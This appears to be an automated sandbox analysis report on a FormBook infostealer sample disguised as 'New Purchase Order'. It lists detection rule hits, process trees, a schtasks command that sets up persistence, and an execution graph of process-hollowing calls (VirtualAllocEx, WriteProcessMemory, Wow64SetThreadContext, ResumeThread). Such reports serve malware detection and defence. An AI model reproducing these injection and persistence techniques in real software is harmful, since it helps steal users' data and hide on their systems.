                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:9
                        Start time:22:50:57
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Imagebase:0xf30000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 21%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:10
                        Start time:22:50:57
                        Start date:08/09/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff693ab0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
                        Imagebase:0x2d0000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x1a0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:14
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x9e0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:16
                        Start time:22:51:11
                        Start date:08/09/2024
                        Path:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe"
                        Imagebase:0x950000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:17
                        Start time:22:51:13
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\setupugc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\setupugc.exe"
                        Imagebase:0xe20000
                        File size:118'784 bytes
                        MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Has exited:false

                        General

                        Target ID:20
                        Start time:22:51:26
                        Start date:08/09/2024
                        Path:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe"
                        Imagebase:0x950000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Has exited:false

                        General

                        Target ID:21
                        Start time:22:51:37
                        Start date:08/09/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff6bf500000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:2.6%
                          Total number of Nodes:229
                          Total number of Limit Nodes:18
                          execution_graph 35377 c84668 35378 c8467a 35377->35378 35379 c84686 35378->35379 35381 c84779 35378->35381 35382 c8479d 35381->35382 35386 c84888 35382->35386 35390 c84879 35382->35390 35387 c848af 35386->35387 35388 c8498c 35387->35388 35394 c844c4 35387->35394 35388->35388 35392 c84888 35390->35392 35391 c8498c 35391->35391 35392->35391 35393 c844c4 CreateActCtxA 35392->35393 35393->35391 35395 c85918 CreateActCtxA 35394->35395 35397 c859db 35395->35397 35357 c8d040 35358 c8d086 GetCurrentProcess 35357->35358 35360 c8d0d8 GetCurrentThread 35358->35360 35361 c8d0d1 35358->35361 35362 c8d10e 35360->35362 35363 c8d115 GetCurrentProcess 35360->35363 35361->35360 35362->35363 35364 c8d14b 35363->35364 35365 c8d173 GetCurrentThreadId 35364->35365 35366 c8d1a4 35365->35366 35375 c8d690 DuplicateHandle 35376 c8d726 35375->35376 35398 6f4871c 35399 6f48726 35398->35399 35400 6f48892 35398->35400 35405 6f4b1be 35399->35405 35424 6f4b148 35399->35424 35442 6f4b158 35399->35442 35401 6f489d6 35406 6f4b14c 35405->35406 35407 6f4b1c1 35405->35407 35460 6f4b6d7 35406->35460 35465 6f4bbe9 35406->35465 35470 6f4b8e8 35406->35470 35475 6f4b70d 35406->35475 35480 6f4b7c2 35406->35480 35485 6f4b701 35406->35485 35493 6f4b960 35406->35493 35497 6f4b906 35406->35497 35510 6f4bd45 35406->35510 35515 6f4bf38 35406->35515 35519 6f4b73e 35406->35519 35527 6f4ba5d 35406->35527 35537 6f4b572 35406->35537 35543 6f4bdf1 35406->35543 35548 6f4b470 35406->35548 35407->35401 35408 6f4b17a 35408->35401 35425 6f4b14c 35424->35425 35427 6f4b6d7 2 API calls 35425->35427 35428 6f4b470 2 API calls 35425->35428 35429 6f4bdf1 2 API calls 35425->35429 35430 6f4b572 2 API calls 35425->35430 35431 6f4ba5d 4 API calls 35425->35431 35432 6f4b73e 4 API calls 35425->35432 35433 6f4bf38 2 API calls 35425->35433 35434 6f4bd45 2 API calls 35425->35434 35435 6f4b906 2 API calls 35425->35435 35436 6f4b960 2 API calls 35425->35436 35437 6f4b701 4 API calls 35425->35437 35438 6f4b7c2 2 API calls 35425->35438 35439 6f4b70d 2 API calls 35425->35439 35440 6f4b8e8 2 API calls 35425->35440 35441 6f4bbe9 2 API calls 35425->35441 35426 6f4b17a 35426->35401 35427->35426 35428->35426 35429->35426 35430->35426 35431->35426 35432->35426 35433->35426 35434->35426 35435->35426 35436->35426 35437->35426 35438->35426 35439->35426 35440->35426 35441->35426 35443 6f4b172 35442->35443 35445 6f4b6d7 2 API calls 35443->35445 35446 6f4b470 2 API calls 35443->35446 35447 6f4bdf1 2 API calls 35443->35447 35448 6f4b572 2 API calls 35443->35448 35449 6f4ba5d 4 API calls 35443->35449 35450 6f4b73e 4 API calls 35443->35450 35451 6f4bf38 2 API calls 35443->35451 35452 6f4bd45 2 API calls 35443->35452 35453 6f4b906 2 API calls 35443->35453 35454 6f4b960 2 API calls 35443->35454 35455 6f4b701 4 API calls 35443->35455 35456 6f4b7c2 2 API calls 35443->35456 35457 6f4b70d 2 API calls 35443->35457 35458 6f4b8e8 2 API calls 35443->35458 35459 6f4bbe9 2 API calls 35443->35459 35444 6f4b17a 35444->35401 35445->35444 35446->35444 35447->35444 35448->35444 35449->35444 35450->35444 35451->35444 35452->35444 35453->35444 35454->35444 35455->35444 35456->35444 35457->35444 35458->35444 35459->35444 35461 6f4b6e9 35460->35461 35554 6f47f71 35461->35554 35558 6f47f78 35461->35558 35462 6f4c004 35466 6f4bbf2 35465->35466 35562 6f48030 35466->35562 35566 6f48038 35466->35566 35467 6f4bc2e 35467->35408 35471 6f4b8f1 35470->35471 35473 6f48030 WriteProcessMemory 35471->35473 35474 6f48038 WriteProcessMemory 35471->35474 35472 6f4bc2e 35472->35408 35473->35472 35474->35472 35476 6f4b71a 35475->35476 35477 6f4be72 35476->35477 35570 6f47580 35476->35570 35574 6f47579 35476->35574 35477->35408 35483 6f48030 WriteProcessMemory 35480->35483 35484 6f48038 WriteProcessMemory 35480->35484 35481 6f4b678 35481->35480 35482 6f4b68a 35481->35482 35482->35408 35483->35481 35484->35481 35486 6f4b70a 35485->35486 35487 6f4b68a 35486->35487 35488 6f4b678 35486->35488 35578 6f48120 35486->35578 35582 6f48128 35486->35582 35487->35408 35488->35487 35491 6f48030 WriteProcessMemory 35488->35491 35492 6f48038 WriteProcessMemory 35488->35492 35491->35488 35492->35488 35586 6f47a60 35493->35586 35590 6f47a68 35493->35590 35494 6f4b97a 35498 6f4b8d8 35497->35498 35499 6f4b8f1 35497->35499 35498->35497 35498->35499 35500 6f4b90c 35498->35500 35501 6f4b737 35498->35501 35503 6f4b68a 35498->35503 35506 6f48030 WriteProcessMemory 35499->35506 35507 6f48038 WriteProcessMemory 35499->35507 35500->35501 35502 6f4b678 35500->35502 35504 6f48030 WriteProcessMemory 35501->35504 35505 6f48038 WriteProcessMemory 35501->35505 35502->35503 35508 6f48030 WriteProcessMemory 35502->35508 35509 6f48038 WriteProcessMemory 35502->35509 35503->35408 35504->35501 35505->35501 35506->35503 35507->35503 35508->35502 35509->35502 35511 6f4bd61 35510->35511 35512 6f4be72 35511->35512 35513 6f47580 ResumeThread 35511->35513 35514 6f47579 ResumeThread 35511->35514 35512->35408 35513->35511 35514->35511 35517 6f48030 WriteProcessMemory 35515->35517 35518 6f48038 WriteProcessMemory 35515->35518 35516 6f4b737 35516->35515 35517->35516 35518->35516 35521 6f4b742 35519->35521 35520 6f4b678 35522 6f4b68a 35520->35522 35525 6f48030 WriteProcessMemory 35520->35525 35526 6f48038 WriteProcessMemory 35520->35526 35521->35520 35521->35522 35523 6f48120 ReadProcessMemory 35521->35523 35524 6f48128 ReadProcessMemory 35521->35524 35522->35408 35523->35521 35524->35521 35525->35520 35526->35520 35528 6f4b802 35527->35528 35535 6f48120 ReadProcessMemory 35527->35535 35536 6f48128 ReadProcessMemory 35527->35536 35529 6f4b678 35528->35529 35530 6f4b68a 35528->35530 35531 6f48120 ReadProcessMemory 35528->35531 35532 6f48128 ReadProcessMemory 35528->35532 35529->35530 35533 6f48030 WriteProcessMemory 35529->35533 35534 6f48038 WriteProcessMemory 35529->35534 35530->35408 35531->35528 35532->35528 35533->35529 35534->35529 35535->35528 35536->35528 35539 6f4b533 35537->35539 35538 6f4b53c 35538->35408 35539->35538 35594 6f482b4 35539->35594 35598 6f482c0 35539->35598 35544 6f4c019 35543->35544 35602 6f4c1d7 35544->35602 35607 6f4c1e8 35544->35607 35545 6f4c032 35550 6f4b4b3 35548->35550 35549 6f4b53c 35549->35408 35550->35549 35552 6f482b4 CreateProcessA 35550->35552 35553 6f482c0 CreateProcessA 35550->35553 35551 6f4b650 35552->35551 35553->35551 35555 6f47f78 VirtualAllocEx 35554->35555 35557 6f47ff5 35555->35557 35557->35462 35559 6f47fb8 VirtualAllocEx 35558->35559 35561 6f47ff5 35559->35561 35561->35462 35563 6f48038 WriteProcessMemory 35562->35563 35565 6f480d7 35563->35565 35565->35467 35567 6f48080 WriteProcessMemory 35566->35567 35569 6f480d7 35567->35569 35569->35467 35571 6f475c0 ResumeThread 35570->35571 35573 6f475f1 35571->35573 35573->35476 35575 6f47580 ResumeThread 35574->35575 35577 6f475f1 35575->35577 35577->35476 35579 6f48128 ReadProcessMemory 35578->35579 35581 6f481b7 35579->35581 35581->35486 35583 6f48173 ReadProcessMemory 35582->35583 35585 6f481b7 35583->35585 35585->35486 35587 6f47a68 Wow64SetThreadContext 35586->35587 35589 6f47af5 35587->35589 35589->35494 35591 6f47aad Wow64SetThreadContext 35590->35591 35593 6f47af5 35591->35593 35593->35494 35595 6f482c0 CreateProcessA 35594->35595 35597 6f4850b 35595->35597 35599 6f48349 CreateProcessA 35598->35599 35601 6f4850b 35599->35601 35603 6f4c1e2 35602->35603 35605 6f47a60 Wow64SetThreadContext 35603->35605 35606 6f47a68 Wow64SetThreadContext 35603->35606 35604 6f4c213 35604->35545 35605->35604 35606->35604 35608 6f4c1fd 35607->35608 35610 6f47a60 Wow64SetThreadContext 35608->35610 35611 6f47a68 Wow64SetThreadContext 35608->35611 35609 6f4c213 35609->35545 35610->35609 35611->35609 35612 c8acb0 35613 c8acbf 35612->35613 35616 c8ada8 35612->35616 35624 c8ad97 35612->35624 35617 c8adb9 35616->35617 35618 c8addc 35616->35618 35617->35618 35632 c8b040 35617->35632 35636 c8b031 35617->35636 35618->35613 35619 c8add4 35619->35618 35620 c8afe0 GetModuleHandleW 35619->35620 35621 c8b00d 35620->35621 35621->35613 35625 c8adb9 35624->35625 35626 c8addc 35624->35626 35625->35626 35630 c8b040 LoadLibraryExW 35625->35630 35631 c8b031 2 API calls 35625->35631 35626->35613 35627 c8add4 35627->35626 35628 c8afe0 GetModuleHandleW 35627->35628 35629 c8b00d 35628->35629 35629->35613 35630->35627 35631->35627 35633 c8b054 35632->35633 35635 c8b079 35633->35635 35643 c8a130 35633->35643 35635->35619 35637 c8afd9 GetModuleHandleW 35636->35637 35640 c8b03a 35636->35640 35639 c8b00d 35637->35639 35639->35619 35641 c8b079 35640->35641 35642 c8a130 LoadLibraryExW 35640->35642 35641->35619 35642->35641 35644 c8b220 LoadLibraryExW 35643->35644 35646 c8b299 35644->35646 35646->35635 35367 6f4c738 35368 6f4c8c3 35367->35368 35370 6f4c75e 35367->35370 35370->35368 35371 6f4c334 35370->35371 35372 6f4c9b8 PostMessageW 35371->35372 35374 6f4ca24 35372->35374 35374->35370

                          Executed Functions

                          Function 06F4D494 Relevance: .4, Instructions: 411COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 55d75af3171f3e80df0999690ddfa8f5079c43098a141774d6fe77ac630c28c5
                          • Instruction ID: 0e36b5ffaf096f8915a2192ba90ae1f3e6e81067c1232c24d5cbcf37af4a9ed1
                          • Opcode Fuzzy Hash: 55d75af3171f3e80df0999690ddfa8f5079c43098a141774d6fe77ac630c28c5
                          • Instruction Fuzzy Hash: CFE1ED31B012048FEB69EBA5C850BAEBBFAAF89304F10446DE145CBA95DF35E901CB51
                          Function 06F4B470 Relevance: .2, Instructions: 157COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76a659e6b53eae4e625e38b4e03c7236dace7ea72d1c45331e2be7425e584834
                          • Instruction ID: 16e9fd224538407d6f169ad96338be9d186dadac4158b593049ac5db6fa799ed
                          • Opcode Fuzzy Hash: 76a659e6b53eae4e625e38b4e03c7236dace7ea72d1c45331e2be7425e584834
                          • Instruction Fuzzy Hash: 62515A72D45219CFEB64DF66CC007E9FBB6BF89300F0091AAD40DA6655EB709A85CF40
                          Function 00C8D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 294 c8d031-c8d0cf GetCurrentProcess 298 c8d0d8-c8d10c GetCurrentThread 294->298 299 c8d0d1-c8d0d7 294->299 300 c8d10e-c8d114 298->300 301 c8d115-c8d149 GetCurrentProcess 298->301 299->298 300->301 302 c8d14b-c8d151 301->302 303 c8d152-c8d16d call c8d618 301->303 302->303 307 c8d173-c8d1a2 GetCurrentThreadId 303->307 308 c8d1ab-c8d20d 307->308 309 c8d1a4-c8d1aa 307->309 309->308
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 00C8D0BE
                          • GetCurrentThread.KERNEL32 ref: 00C8D0FB
                          • GetCurrentProcess.KERNEL32 ref: 00C8D138
                          • GetCurrentThreadId.KERNEL32 ref: 00C8D191
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 62a4a83cf78f337fb8ae67a16b1eb1876154231856b5ed0a26cccb8729f71482
                          • Instruction ID: fb45168484f851baa8271b73a6067fbf51f0525617284e6ed86ce82fb70e1ad9
                          • Opcode Fuzzy Hash: 62a4a83cf78f337fb8ae67a16b1eb1876154231856b5ed0a26cccb8729f71482
                          • Instruction Fuzzy Hash: 7F5185B09002498FDB14DFA9C548BDEBFF1AF88318F20C069E059A73A0D7759985CF29
                          Function 00C8D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 316 c8d040-c8d0cf GetCurrentProcess 320 c8d0d8-c8d10c GetCurrentThread 316->320 321 c8d0d1-c8d0d7 316->321 322 c8d10e-c8d114 320->322 323 c8d115-c8d149 GetCurrentProcess 320->323 321->320 322->323 324 c8d14b-c8d151 323->324 325 c8d152-c8d16d call c8d618 323->325 324->325 329 c8d173-c8d1a2 GetCurrentThreadId 325->329 330 c8d1ab-c8d20d 329->330 331 c8d1a4-c8d1aa 329->331 331->330
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 00C8D0BE
                          • GetCurrentThread.KERNEL32 ref: 00C8D0FB
                          • GetCurrentProcess.KERNEL32 ref: 00C8D138
                          • GetCurrentThreadId.KERNEL32 ref: 00C8D191
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: fd17a3c6c52745001641aa5b2e845b1ada6fb94cb4707e2cb693b1db6e026a09
                          • Instruction ID: 11b50a56dd8b465a8dcd76da580f23caa47cfbd81c27fa3b042a44cd81712717
                          • Opcode Fuzzy Hash: fd17a3c6c52745001641aa5b2e845b1ada6fb94cb4707e2cb693b1db6e026a09
                          • Instruction Fuzzy Hash: 585167B09002498FDB14DFA9D548BDEBBF1EF88318F20C459D059A73A0D7759984CF69
                          Function 06F482B4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 571 6f482b4-6f48355 574 6f48357-6f48361 571->574 575 6f4838e-6f483ae 571->575 574->575 576 6f48363-6f48365 574->576 582 6f483e7-6f48416 575->582 583 6f483b0-6f483ba 575->583 577 6f48367-6f48371 576->577 578 6f48388-6f4838b 576->578 580 6f48375-6f48384 577->580 581 6f48373 577->581 578->575 580->580 584 6f48386 580->584 581->580 589 6f4844f-6f48509 CreateProcessA 582->589 590 6f48418-6f48422 582->590 583->582 585 6f483bc-6f483be 583->585 584->578 587 6f483c0-6f483ca 585->587 588 6f483e1-6f483e4 585->588 591 6f483cc 587->591 592 6f483ce-6f483dd 587->592 588->582 603 6f48512-6f48598 589->603 604 6f4850b-6f48511 589->604 590->589 593 6f48424-6f48426 590->593 591->592 592->592 594 6f483df 592->594 595 6f48428-6f48432 593->595 596 6f48449-6f4844c 593->596 594->588 598 6f48434 595->598 599 6f48436-6f48445 595->599 596->589 598->599 599->599 600 6f48447 599->600 600->596 614 6f485a8-6f485ac 603->614 615 6f4859a-6f4859e 603->615 604->603 617 6f485bc-6f485c0 614->617 618 6f485ae-6f485b2 614->618 615->614 616 6f485a0 615->616 616->614 620 6f485d0-6f485d4 617->620 621 6f485c2-6f485c6 617->621 618->617 619 6f485b4 618->619 619->617 623 6f485e6-6f485ed 620->623 624 6f485d6-6f485dc 620->624 621->620 622 6f485c8 621->622 622->620 625 6f48604 623->625 626 6f485ef-6f485fe 623->626 624->623 628 6f48605 625->628 626->625 628->628
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F484F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e099eff7cfe8c9c2bae482d92dabc64deed8f8c95dbef8335dfecc26e389947c
                          • Instruction ID: 1221c5307534a97f0e3d824e85adb5e0f65dde8c9b60fc0ab404111ad072a87b
                          • Opcode Fuzzy Hash: e099eff7cfe8c9c2bae482d92dabc64deed8f8c95dbef8335dfecc26e389947c
                          • Instruction Fuzzy Hash: DFA19B71D00219DFDB60DFA8CC41BEEBBB2BF48354F0481A9E819A7650DB749985CF92
                          Function 06F482C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 629 6f482c0-6f48355 631 6f48357-6f48361 629->631 632 6f4838e-6f483ae 629->632 631->632 633 6f48363-6f48365 631->633 639 6f483e7-6f48416 632->639 640 6f483b0-6f483ba 632->640 634 6f48367-6f48371 633->634 635 6f48388-6f4838b 633->635 637 6f48375-6f48384 634->637 638 6f48373 634->638 635->632 637->637 641 6f48386 637->641 638->637 646 6f4844f-6f48509 CreateProcessA 639->646 647 6f48418-6f48422 639->647 640->639 642 6f483bc-6f483be 640->642 641->635 644 6f483c0-6f483ca 642->644 645 6f483e1-6f483e4 642->645 648 6f483cc 644->648 649 6f483ce-6f483dd 644->649 645->639 660 6f48512-6f48598 646->660 661 6f4850b-6f48511 646->661 647->646 650 6f48424-6f48426 647->650 648->649 649->649 651 6f483df 649->651 652 6f48428-6f48432 650->652 653 6f48449-6f4844c 650->653 651->645 655 6f48434 652->655 656 6f48436-6f48445 652->656 653->646 655->656 656->656 657 6f48447 656->657 657->653 671 6f485a8-6f485ac 660->671 672 6f4859a-6f4859e 660->672 661->660 674 6f485bc-6f485c0 671->674 675 6f485ae-6f485b2 671->675 672->671 673 6f485a0 672->673 673->671 677 6f485d0-6f485d4 674->677 678 6f485c2-6f485c6 674->678 675->674 676 6f485b4 675->676 676->674 680 6f485e6-6f485ed 677->680 681 6f485d6-6f485dc 677->681 678->677 679 6f485c8 678->679 679->677 682 6f48604 680->682 683 6f485ef-6f485fe 680->683 681->680 685 6f48605 682->685 683->682 685->685
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F484F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 1ba787eca15fa6999283b917a3a3f3a1e2da0ac8f4d3d39c265b68dc2f727ca1
                          • Instruction ID: 6237faec99844f274414e9862a517723cdeb3cd4edc75f101fd88d423fddf760
                          • Opcode Fuzzy Hash: 1ba787eca15fa6999283b917a3a3f3a1e2da0ac8f4d3d39c265b68dc2f727ca1
                          • Instruction Fuzzy Hash: 42919C71D00219DFDB60DFA8C841BEEBBB2BF48354F0481A9E819A7650DB74D985CF91
                          Function 00C8ADA8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
